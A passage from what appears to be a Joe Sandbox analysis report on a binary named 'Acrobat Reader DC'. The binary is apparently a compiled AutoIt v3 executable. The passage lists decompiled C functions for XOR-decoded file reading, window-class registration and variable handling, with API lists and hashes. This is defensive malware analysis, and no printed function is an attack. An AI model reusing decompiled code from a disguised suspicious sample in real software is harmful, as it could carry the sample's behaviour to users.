                                  • Opcode Fuzzy Hash: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                  • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004528BD Relevance: 19.7, APIs: 13, Instructions: 173COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  C-Code - Quality: 88%
                                  			E004528BD(void* __eflags, signed int _a4, char _a8, intOrPtr* _a12, signed int* _a16, char _a19) {
				char _v8;
				signed int _v12;
				short _v32;
				short _v582;
				short _v1104;
				short _v1108;
				short _v1112;
				short _v1116;
				short _v1120;
				short _v1124;
				short _v1128;
				short _v1132;
				short _v1136;
				char _v1140;
				char _v1668;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t56;
				intOrPtr _t67;
				intOrPtr _t68;
				signed int* _t86;
				intOrPtr _t87;
				void* _t110;
				intOrPtr* _t113;

				_t86 = _a16;
				_t113 = _a4;
				_push(0);
				_v1140 = 0;
				_v1136 = 0;
				_v1132 = 0;
				_v1128 = 0;
				_v1124 = 0;
				_v1120 = 0;
				_v1116 = 0;
				_v1112 = 0;
				_v1108 = 0;
				_v32 = 0;
				_v1104 = 0;
				_push( *((intOrPtr*)(_t113 + 4)));
				_push( *_t113);
				_v582 = 0;
				_v8 = 1;
				E004150D1(_t86, 0, _t110, _t113, __eflags); // executed
				_t56 = E00452719(__eflags, _t113, _a8,  &_v1668); // executed
				if(_t56 == 0) {
					E00414D04( &_a19, 1, 1,  *_t113);
					E00414D04( &_a4, 4, 1,  *_t113);
					_t112 = _a4 ^ 0x000087bc;
					E00414D04( &_a4, 4, 1,  *_t113);
					 *_t86 = _a4 ^ 0x000087bc;
					E00414D04( &_a4, 4, 1,  *_t113);
					_push(1);
					_push(0x10);
					_push( *_t113);
					_v12 = _a4 ^ 0x0000a685;
					E004150D1(_t86,  *_t113, _a4 ^ 0x000087bc, _t113, __eflags); // executed
					_t67 = E004135BB( *_t86, _a4 ^ 0x000087bc, _t113,  *_t86); // executed
					_a8 = _t67;
					_t68 = E004135BB( *_t86, _a4 ^ 0x000087bc, _t113, _t112); // executed
					_t87 = _t68;
					E00414D04(_t87, _t112, 1,  *_t113); // executed
					E0044AFEF( *((intOrPtr*)(_t113 + 8)) + 0x2477, __eflags, _t87, _t112,  *((intOrPtr*)(_t113 + 8)) + 0x2477);
					E00432229( &_v8, _t87, _t112);
					__eflags = _v12 - _v8;
					if(_v12 == _v8) {
						__eflags = _a19 - 1;
						if(_a19 != 1) {
							E00413748(_a8);
							_a8 = _t87;
						} else {
							_v1132 = 0;
							_v1128 = 0;
							_v1124 = 0;
							_v1112 = 0;
							_v1108 = 0;
							_v32 = 0;
							_v1120 = 1;
							_v1116 = 1;
							_v1104 = 0;
							_v582 = 0;
							_v1136 = _t87;
							_v1140 = _a8;
							E0044B1A9(_a8, _t112,  &_v1140); // executed
							E00413748(_t87); // executed
						}
						 *_a12 = _a8;
						__eflags = 0;
						return 0;
					} else {
						E00413748(_a8);
						E00413748(_t87);
						return 0xa;
					}
				} else {
					return 6;
				}
			}





























                                  0x004528c9
                                  0x004528cd
                                  0x004528d1
                                  0x004528d4
                                  0x004528da
                                  0x004528e0
                                  0x004528e6
                                  0x004528ec
                                  0x004528f2
                                  0x004528f8
                                  0x004528fe
                                  0x00452904
                                  0x0045290a
                                  0x00452910
                                  0x00452919
                                  0x0045291c
                                  0x0045291d
                                  0x00452924
                                  0x0045292b
                                  0x0045293f
                                  0x00452946
                                  0x00452961
                                  0x00452971
                                  0x00452984
                                  0x0045298a
                                  0x004529a3
                                  0x004529a5
                                  0x004529b2
                                  0x004529b9
                                  0x004529bb
                                  0x004529bc
                                  0x004529bf
                                  0x004529ca
                                  0x004529d3
                                  0x004529d6
                                  0x004529de
                                  0x004529e7
                                  0x004529fb
                                  0x00452a06
                                  0x00452a0e
                                  0x00452a11
                                  0x00452a36
                                  0x00452a3a
                                  0x00452aa9
                                  0x00452aae
                                  0x00452a3c
                                  0x00452a3e
                                  0x00452a44
                                  0x00452a4a
                                  0x00452a50
                                  0x00452a56
                                  0x00452a5c
                                  0x00452a66
                                  0x00452a6c
                                  0x00452a72
                                  0x00452a85
                                  0x00452a8c
                                  0x00452a92
                                  0x00452a98
                                  0x00452a9e
                                  0x00452a9e
                                  0x00452abc
                                  0x00452abe
                                  0x00452ac4
                                  0x00452a13
                                  0x00452a17
                                  0x00452a20
                                  0x00452a33
                                  0x00452a33
                                  0x00452948
                                  0x00452953
                                  0x00452953

                                  APIs
                                  • _fseek.LIBCMT ref: 0045292B
                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                    • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                    • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                  • __fread_nolock.LIBCMT ref: 00452961
                                  • __fread_nolock.LIBCMT ref: 00452971
                                  • __fread_nolock.LIBCMT ref: 0045298A
                                  • __fread_nolock.LIBCMT ref: 004529A5
                                  • _fseek.LIBCMT ref: 004529BF
                                  • _malloc.LIBCMT ref: 004529CA
                                  • _malloc.LIBCMT ref: 004529D6
                                  • __fread_nolock.LIBCMT ref: 004529E7
                                  • _free.LIBCMT ref: 00452A17
                                  • _free.LIBCMT ref: 00452A20
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                                  • String ID:
                                  • API String ID: 1255752989-0
                                  • Opcode ID: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                  • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                                  • Opcode Fuzzy Hash: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                  • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00410390 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 76windowregistryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  C-Code - Quality: 100%
                                  			E00410390() {
				struct _WNDCLASSEXW _v52;
				struct HICON__* _t18;
				struct HICON__* _t19;
				intOrPtr _t21;
				void* _t22;
				short _t23;
				void* _t24;
				void* _t25;
				struct HICON__* _t26;
				struct HICON__* _t28;
				struct HICON__* _t29;
				struct HBRUSH__* _t34;
				int _t36;

				_t34 = GetSysColorBrush(0xf);
				_t26 = LoadCursorW(0, 0x7f00);
				_t18 = LoadIconW( *0x497520, 0x63); // executed
				 *0x4a7f40 = _t18; // executed
				_t19 = LoadIconW( *0x497520, 0xa4); // executed
				 *0x4a7f48 = _t19;
				 *0x4a7f4c = LoadIconW( *0x497520, 0xa2);
				_t21 =  *0x4a9604; // 0xa52e98
				if( *((char*)(_t21 + 0x1f)) == 0) {
					_t22 = E0044395E(4);
					_t36 = 0;
				} else {
					_t36 = 0;
					_t22 = LoadImageW( *0x497520, 0x63, 1, 0x10, 0x10, 0);
				}
				_t28 =  *0x4a7f40; // 0xc01cf
				_v52.hInstance =  *0x497520;
				 *0x4a7f44 = _t22;
				_v52.cbSize = 0x30;
				_v52.style = 0x23;
				_v52.cbClsExtra = _t36;
				_v52.cbWndExtra = _t36;
				_v52.hCursor = _t26;
				_v52.hbrBackground = _t34;
				_v52.lpszMenuName = _t36;
				_v52.lpszClassName = L"AutoIt v3";
				_v52.hIcon = _t28;
				_v52.hIconSm = _t22;
				_v52.lpfnWndProc = E004010E0;
				_t23 = RegisterClassExW( &_v52);
				_t29 =  *0x4a7f40; // 0xc01cf
				 *0x4974e4 = _t23;
				_t24 =  *0x4a7f44; // 0xc006f
				_t25 = E00410490(_t29, _t24); // executed
				return _t25;
			}
















                                  0x004103a8
                                  0x004103b6
                                  0x004103c0
                                  0x004103ce
                                  0x004103d3
                                  0x004103e1
                                  0x004103e8
                                  0x004103ed
                                  0x004103f6
                                  0x00428363
                                  0x0042836b
                                  0x004103fc
                                  0x00410402
                                  0x0041040e
                                  0x0041040e
                                  0x0041041a
                                  0x00410420
                                  0x00410427
                                  0x0041042c
                                  0x00410433
                                  0x0041043a
                                  0x0041043d
                                  0x00410440
                                  0x00410443
                                  0x00410446
                                  0x00410449
                                  0x00410450
                                  0x00410453
                                  0x00410456
                                  0x0041045d
                                  0x00410463
                                  0x00410469
                                  0x0041046f
                                  0x00410476
                                  0x00410481

                                  APIs
                                  • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                  • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                  • LoadIconW.USER32(?,00000063), ref: 004103C0
                                  • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                  • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                  • LoadImageW.USER32 ref: 0041040E
                                  • RegisterClassExW.USER32 ref: 0041045D
                                    • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                    • Part of subcall function 00410490: RegisterClassExW.USER32 ref: 004104ED
                                    • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                    • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                    • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                    • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                    • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00BCE420,000000FF,00000000), ref: 00410552
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                  • String ID: #$0$AutoIt v3
                                  • API String ID: 423443420-4155596026
                                  • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                  • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                  • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                  • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00410490 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 56windowregistryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  C-Code - Quality: 82%
                                  			E00410490(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				char _v12;
				struct _WNDCLASSEXW _v60;
				struct HINSTANCE__* _t19;
				void* _t25;
				void* _t26;
				int _t27;
				struct HINSTANCE__* _t29;
				void* _t31;

				_t19 =  *0x497520;
				 *0x4a8684 = _t19;
				_v60.cbSize = 0x30;
				_v60.style = 0x2b;
				_v60.cbClsExtra = 0;
				_v60.cbWndExtra = 0x1e;
				_v60.hInstance = _t19;
				_v60.hCursor = 0;
				_v60.hbrBackground = GetSysColorBrush(0xf);
				_v60.lpszMenuName = 0;
				_v60.hIconSm = _a8;
				_v60.hIcon = _a4;
				_v60.lpszClassName = L"AutoIt v3 GUI";
				_v60.lpfnWndProc = 0x47f08f;
				 *0x4974e0 = RegisterClassExW( &_v60);
				 *0x4a8688 = RegisterWindowMessageW(L"TaskbarCreated");
				_v12 = 8;
				_v8 = 0x13b;
				__imp__InitCommonControlsEx( &_v12);
				_t25 = ImageList_Create(0x10, 0x10, 0x21, 1, 1);
				_t29 =  *0x4a8684; // 0x400000
				 *0x4a86dc = _t25;
				_t26 = LoadIconW(_t29, 0xa9);
				_t31 =  *0x4a86dc; // 0xbce420
				_t27 = ImageList_ReplaceIcon(_t31, 0xffffffff, _t26); // executed
				 *0x4a86e0 = 0;
				return _t27;
			}












                                  0x00410496
                                  0x004104a0
                                  0x004104a5
                                  0x004104ac
                                  0x004104b3
                                  0x004104b6
                                  0x004104bd
                                  0x004104c0
                                  0x004104cc
                                  0x004104d6
                                  0x004104d9
                                  0x004104dc
                                  0x004104df
                                  0x004104e6
                                  0x004104f8
                                  0x00410504
                                  0x0041050d
                                  0x00410514
                                  0x0041051b
                                  0x0041052b
                                  0x00410531
                                  0x0041053d
                                  0x00410542
                                  0x00410548
                                  0x00410552
                                  0x00410558
                                  0x00410562

                                  APIs
                                  • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                  • RegisterClassExW.USER32 ref: 004104ED
                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                  • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                  • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                  • ImageList_ReplaceIcon.COMCTL32(00BCE420,000000FF,00000000), ref: 00410552
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                  • String ID: +$0$TaskbarCreated
                                  • API String ID: 2914291525-888179712
                                  • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                  • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                  • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                  • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040A780 Relevance: 16.6, APIs: 8, Strings: 1, Instructions: 881COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 62%
                                  			E0040A780(void __ecx, void* __fp0, void* _a4, void* _a8, void* _a12, intOrPtr _a16) {
				char _v28;
				void _v32;
				char _v48;
				char _v52;
				intOrPtr _v56;
				void* _v60;
				char _v64;
				char _v68;
				void _v72;
				char _v76;
				void _v80;
				char _v84;
				char _v85;
				void* _v92;
				char _v95;
				short _v96;
				void _v100;
				void* _v104;
				void* _v108;
				void _v112;
				char _v115;
				short _v116;
				char _v119;
				void* _v120;
				void* _v124;
				void* _v128;
				void _v136;
				void* _v140;
				char _v148;
				void* _v152;
				void* _v156;
				void _v160;
				void __ebx;
				void* __edi;
				void* __esi;
				void* _t371;
				intOrPtr _t380;
				void* _t381;
				void* _t382;
				void** _t384;
				void* _t385;
				void* _t387;
				void* _t388;
				void* _t389;
				intOrPtr _t390;
				void* _t409;
				void* _t411;
				void* _t412;
				void* _t413;
				signed int _t414;
				void* _t422;
				void** _t427;
				void* _t428;
				void* _t430;
				void* _t431;
				void* _t438;
				void* _t442;
				void* _t443;
				void* _t446;
				void* _t448;
				void* _t449;
				void* _t450;
				void* _t451;
				signed int _t452;
				void* _t459;
				void _t490;
				short _t491;
				void* _t492;
				void* _t493;
				void* _t494;
				void** _t495;
				void* _t496;
				void* _t499;
				void* _t501;
				void** _t502;
				void* _t503;
				signed int _t508;
				void** _t517;
				void* _t521;
				void* _t525;
				void* _t531;
				void* _t534;
				void* _t546;
				void _t547;
				void* _t551;
				void _t554;
				signed int* _t559;
				void* _t563;
				signed int _t572;
				void* _t574;
				void* _t575;
				void* _t594;

				_t594 = __fp0;
				_t574 = (_t572 & 0xfffffff8) - 0x84;
				_v112 = __ecx;
				_t580 =  *0x4a9600 & 0x00000001;
				if(( *0x4a9600 & 0x00000001) == 0) {
					 *0x4a9600 =  *0x4a9600 | 0x00000001;
					 *0x4a95f0 = 0;
					 *0x4a95f8 = 1;
					 *0x4a95fc = 0;
					E0041130A(__eflags, 0x425c21);
					_t574 = _t574 + 4;
				}
				_t563 = _a12;
				_push(8);
				_v96 = 1;
				_v128 = _t563;
				_v124 = 0;
				_v120 = 0;
				_v116 = 1;
				_t371 = E004115D7(0, _t563, _t580);
				_t575 = _t574 + 4;
				if(_t371 == 0) {
					_t371 = 0;
				} else {
					 *_t371 = 0x14;
				}
				 *((intOrPtr*)(_t371 + 4)) = 0;
				_t559 = _a8;
				_v100 = _t371;
				_v104 = 1;
				_v108 = 0x17;
				_v92 = ( *( *((intOrPtr*)(_a4 + 4)) +  *_t559 * 4))[2];
				while(1) {
					L4:
					_t508 =  *_t559;
					if(_t508 == _a16) {
						goto L9;
					}
					L5:
					_t380 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 4)) + _t508 * 4));
					if( *((short*)(_t380 + 8)) == 0x7f) {
						goto L9;
					}
					_t491 =  *((short*)(_t380 + 8));
					if(_t491 == 0x36) {
						_t492 = _v124;
						_v108 = 0x16;
						__eflags = _t492;
						if(_t492 != 0) {
							__eflags = _v115;
							if(__eflags == 0) {
								_push(0x18);
								_t381 = E004115D7(_t559, _t563, __eflags);
								_t575 = _t575 + 4;
								__eflags = _t381;
								if(_t381 == 0) {
									_t382 = 0;
								} else {
									_v136 = _t381;
									_t496 = _v136;
									E0040B960(0x4a95f0, _t496, _t508, _t559);
									_t382 = _t496;
									_t492 = _v124;
								}
								 *((intOrPtr*)(_t382 + 0x10)) = _v120;
								_v120 = _t382;
							} else {
								E00408E80(_v120, _t508, 0x4a95f0);
								_t492 = _v128;
								_v119 = 0;
							}
							L31:
							_t384 =  *( *((intOrPtr*)(_a4 + 4)) +  *_t559 * 4);
							_t493 = _t492 + 1;
							_v124 = _t493;
							__eflags = _t493 - 1;
							if(_t493 != 1) {
								__eflags = _v115;
								_t543 = _v120;
								if(_v115 != 0) {
									_v136 =  *((intOrPtr*)(_t543 + 0x10));
								} else {
									_v136 = _t543;
								}
							} else {
								_v136 = _t563;
							}
							_t517 = _v136;
							_t494 =  *_t384;
							_t385 = _t517[3];
							__eflags = _t385;
							if(_t385 != 0) {
								E004431AD(_t385);
								_t517 = _v140;
								_t517[3] = 0;
							}
							_t387 = _t517[2];
							__eflags = _t387 - 8;
							if(_t387 == 8) {
								_t543 =  *_t517;
								__eflags = _t543;
								if(_t543 == 0) {
									goto L35;
								}
								__imp__#9(_t543);
								_t543 =  *_v140;
								_push( *_v140);
								E004111DC();
								_t575 = _t575 + 4;
								goto L39;
							} else {
								L35:
								__eflags = _t387 - 0xa;
								if(_t387 == 0xa) {
									_t518 =  *_t517;
									__eflags =  *_t517;
									if(__eflags != 0) {
										E0044318E(_t518);
									}
								} else {
									__eflags = _t387 - 5;
									if(_t387 == 5) {
										E0040E270(_v136, _t563);
									} else {
										__eflags = _t387 - 0xb;
										if(_t387 == 0xb) {
											_t521 =  *_v136;
											_t543 =  *(_t521 + 4);
											_push( *(_t521 + 4));
											E004111DC();
											_push( *_v136);
											E004111DC();
											_t575 = _t575 + 8;
										} else {
											__eflags = _t387 - 0xc;
											if(__eflags == 0) {
												_t523 =  *_t517;
												__eflags =  *_t517;
												if(__eflags != 0) {
													E0044B3D9(_t523);
												}
											}
										}
									}
								}
								L39:
								_t388 = _v136;
								_push(0x10);
								 *_t388 = 0;
								 *(_t388 + 8) = 4;
								_t389 = E004115D7(_t559, _t563, __eflags);
								_t575 = _t575 + 4;
								__eflags = _t389;
								if(_t389 == 0) {
									_t389 = 0;
								} else {
									 *_t389 =  *_t494;
									 *((intOrPtr*)(_t389 + 4)) =  *((intOrPtr*)(_t494 + 4));
									_t543 =  *(_t494 + 8);
									 *(_t389 + 8) =  *(_t494 + 8);
									_t495 =  *(_t494 + 0xc);
									 *(_t389 + 0xc) = _t495;
									 *_t495 =  *_t495 + 1;
									__eflags =  *_t495;
								}
								 *(_v136 + 0xc) = _t389;
								_t390 = _v112;
								 *_t559 = 1 +  *_t559;
								__eflags =  *((char*)(_t390 + 0xfd));
								if( *((char*)(_t390 + 0xfd)) != 0) {
									E00457F66(_t543, __eflags, _t594, E0040D0B0( &_v128));
									_t390 = _v116;
								}
								__eflags =  *((char*)(_t390 + 0xfe));
								if( *((char*)(_t390 + 0xfe)) != 0) {
									E00472F47(_v112, __eflags, _t594, _v112, E0040D0B0( &_v128));
								}
								while(1) {
									L4:
									_t508 =  *_t559;
									if(_t508 == _a16) {
										goto L9;
									}
									goto L5;
								}
							}
						}
						__eflags = _t563 - 0x4a95f0;
						if(_t563 == 0x4a95f0) {
							goto L31;
						}
						_t409 =  *(_t563 + 0xc);
						__eflags = _t409;
						if(_t409 != 0) {
							E004431AD(_t409);
							 *(_t563 + 0xc) = 0;
						}
						_t411 =  *(_t563 + 8);
						__eflags = _t411 - 8;
						if(_t411 == 8) {
							_t525 =  *_t563;
							__eflags = _t525;
							if(_t525 == 0) {
								goto L25;
							}
							__imp__#9(_t525);
							_push( *_t563);
							E004111DC();
							_t575 = _t575 + 4;
							goto L29;
						} else {
							L25:
							__eflags = _t411 - 0xa;
							if(_t411 == 0xa) {
								_t412 =  *_t563;
								__eflags = _t412;
								if(_t412 != 0) {
									E0044318E(_t412);
								}
							} else {
								__eflags = _t411 - 5;
								if(_t411 == 5) {
									E0040E270(_t563, _t563);
								} else {
									__eflags = _t411 - 0xb;
									if(_t411 == 0xb) {
										_push( *((intOrPtr*)( *_t563 + 4)));
										E004111DC();
										_push( *_t563);
										E004111DC();
										_t575 = _t575 + 8;
									} else {
										__eflags = _t411 - 0xc;
										if(_t411 == 0xc) {
											_t422 =  *_t563;
											__eflags = _t422;
											if(_t422 != 0) {
												E0044B3D9(_t422);
											}
										}
									}
								}
							}
							L29:
							 *(_t563 + 8) = 1;
							 *_t563 = 0;
							_t546 =  *0x4a95f8; // 0x1
							 *(_t563 + 8) = _t546;
							_t413 =  *0x4a95f8; // 0x1
							__eflags = _t413 - 1;
							if(_t413 != 1) {
								_t414 = _t413 - 1;
								__eflags = _t414 - 0xb;
								if(__eflags > 0) {
									goto L31;
								}
								switch( *((intOrPtr*)(_t414 * 4 +  &M0042BCDE))) {
									case 0:
										goto L30;
									case 1:
										 *_t563 =  *0x4a95f0;
										 *((intOrPtr*)(_t563 + 4)) =  *0x4a95f4;
										goto L31;
									case 2:
										__fp0 =  *0x4a95f0;
										 *__esi = __fp0;
										goto L31;
									case 3:
										_push(0x10);
										__eax = E004115D7(__edi, __esi, __eflags);
										__esp = __esp + 4;
										__eflags = __eax;
										if(__eax == 0) {
											__eax = 0;
											 *(__esi + 0xc) = 0;
										} else {
											__ecx =  *0x4a95fc;
											__edx =  *__ecx;
											 *__eax =  *__ecx;
											__edx =  *(__ecx + 4);
											 *(__eax + 4) =  *(__ecx + 4);
											__edx =  *(__ecx + 8);
											 *(__eax + 8) = __edx;
											__ecx =  *(__ecx + 0xc);
											 *(__eax + 0xc) = __ecx;
											 *__ecx = 1 +  *__ecx;
											 *(__esi + 0xc) = __eax;
										}
										goto L31;
									case 4:
										_push(0x214);
										__eax = E004115D7(__edi, __esi, __eflags);
										__esp = __esp + 4;
										__eflags = __eax;
										if(__eax == 0) {
											__eax = 0;
											__eflags = 0;
										} else {
											__esi =  *0x4a95f0;
											__ebx = _v124;
											__ecx = 0x85;
											__edi = __eax;
											__eax = memcpy(__eax, __esi, 0x85 << 2);
											__esi + __ecx = __esi + __ecx + __ecx;
											__ecx = 0;
											__esi = _v128;
											__edi = _a8;
										}
										 *__esi = __eax;
										__eflags =  *(__eax + 4);
										if( *(__eax + 4) != 0) {
											__eax =  *(__eax + 4);
											 *__eax = 1 +  *__eax;
										}
										goto L31;
									case 5:
										__eax =  *0x4a95f0;
										 *__esi = __eax;
										goto L31;
									case 6:
										__ecx =  *0x4a95f0;
										 *__esi =  *0x4a95f0;
										goto L31;
									case 7:
										__eflags =  *0x4a95f0;
										if(__eflags != 0) {
											_push(0x10);
											__eax = E004115D7(__edi, __esi, __eflags);
											__esp = __esp + 4;
											_push(__eax);
											 *__esi = __eax;
											__imp__#8();
											__edx =  *0x4a95f0;
											__eax =  *__esi;
											_push(__edx);
											_push(__eax);
											__imp__#10();
											__eflags = __eax;
											if(__eax < 0) {
												__ecx =  *__esi;
												_push( *__esi);
												__imp__#9();
												__edx =  *__esi;
												_push(__edx);
												__eax = E004111DC();
												__esp = __esp + 4;
												 *__esi = 0;
											}
										}
										goto L31;
									case 8:
										__al =  *0x4a95f0;
										 *__esi = __al;
										goto L31;
									case 9:
										_push(0x18);
										__eax = E004115D7(__edi, __esi, __eflags);
										__esp = __esp + 4;
										__eflags = __eax;
										if(__eax == 0) {
											goto L255;
										}
										__ecx =  *0x4a95f0;
										__eax = E0044B8A3(__eax,  *0x4a95f0);
										 *__esi = __eax;
										goto L31;
									case 0xa:
										_push(8);
										__eax = E004115D7(__edi, __esi, __eflags);
										 *__esi = __eax;
										__edx =  *0x4a95f0;
										__ecx =  *( *0x4a95f0);
										 *__eax =  *( *0x4a95f0);
										__edx =  *__esi;
										__eax =  *( *__esi);
										__esp = __esp + 4;
										__eflags = __eax;
										if(__eflags == 0) {
											_push(1);
											__eax = E004115D7(__edi, __esi, __eflags);
											__ecx =  *__esi;
											 *( *__esi + 4) = __eax;
											__edx =  *__esi;
											__eax =  *(__edx + 4);
											__esp = __esp + 4;
											 *__eax = 0;
										} else {
											_push(__eax);
											__eax = E004115D7(__edi, __esi, __eflags);
											__ecx =  *__esi;
											 *( *__esi + 4) = __eax;
											__eax =  *__esi;
											__edx =  *__eax;
											__ecx =  *0x4a95f0;
											__eax =  *(__eax + 4);
											__esp = __esp + 4;
											__edx =  *( *0x4a95f0 + 4);
											__eax = E00410E60(__eax,  *( *0x4a95f0 + 4),  *( *0x4a95f0 + 4));
										}
										goto L31;
									case 0xb:
										_push(0x14);
										__eax = E004115D7(__edi, __esi, __eflags);
										__esp = __esp + 4;
										__eflags = __eax;
										if(__eax == 0) {
											L255:
											__eax = 0;
											 *__esi = 0;
											goto L31;
										}
										__ecx =  *0x4a95f0;
										__eax = E00470870(__eax,  *0x4a95f0);
										 *__esi = __eax;
										goto L31;
								}
							}
							L30:
							_t547 =  *0x4a95f0; // 0x0
							 *_t563 = _t547;
							goto L31;
						}
					}
					if(_t491 < 0x37 || _t491 >= 0x41) {
						__eflags = _t491 - 5;
						if(_t491 != 5) {
							__eflags = _t491 - 0x51;
							if(_t491 > 0x51) {
								goto L9;
							}
							_t88 = _t491 + 0x40af4c; // 0xec
